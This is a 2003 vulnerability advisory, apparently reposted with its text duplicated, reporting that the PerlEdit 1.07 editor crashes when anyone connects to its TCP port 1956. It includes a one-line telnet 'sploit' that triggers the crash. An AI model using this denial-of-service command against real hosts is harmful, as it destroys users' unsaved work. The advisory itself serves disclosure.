Product:
--------
PerlEdit
http://www.indigostar.com/perledit.html
All versions to current ( 1.07 )
Description of product:
-----------------------
"PerlEdit is an IDE for Perl and a general-purpose text editor.
It includes a source code text editor with syntax highlighting
and a visual debugger."
Upon execution perledit binds to local TCP port 1956.
By connecting via Telnet localy or remotely causes the program
to crash, resulting in a total loss of unsaved data.
------------- 'sploit -------------------------
telnet host-running-perledit 1956
READY
( exit telnet ) remote perledit crashes.
Further investigation may lead to more serious issues, I did not
persue as this was bad enough.
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
support (at) indigostar (dot) com [email concealed] - Concurrent with this advisory
Credits:
--------
Donnie Werner
http://exploitlabs.com
http://nothackers.org - Freedom of Voice - Freedom of Choice
- EXPL-A-2003-010 exploitlabs.com Advisory 010
------------------------------------------------------------------
-= PerlEdit =-
exploitlabs.com
June 21, 2003
Vunerability:
-------------
Remote Buffer Overflow
Product:
--------
PerlEdit
http://www.indigostar.com/perledit.html
All versions to current ( 1.07 )
Description of product:
-----------------------
"PerlEdit is an IDE for Perl and a general-purpose text editor.
It includes a source code text editor with syntax highlighting
and a visual debugger."
screenshot: http://www.indigostar.com/perledit_screenshots.html
VUNERABILITY / EXPLOIT
======================
Upon execution perledit binds to local TCP port 1956.
By connecting via Telnet localy or remotely causes the program
to crash, resulting in a total loss of unsaved data.
------------- 'sploit -------------------------
telnet host-running-perledit 1956
READY
( exit telnet ) remote perledit crashes.
Further investigation may lead to more serious issues, I did not
persue as this was bad enough.
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
support (at) indigostar (dot) com [email concealed] - Concurrent with this advisory
Credits:
--------
Donnie Werner
http://exploitlabs.com
http://nothackers.org - Freedom of Voice - Freedom of Choice
[ reply ]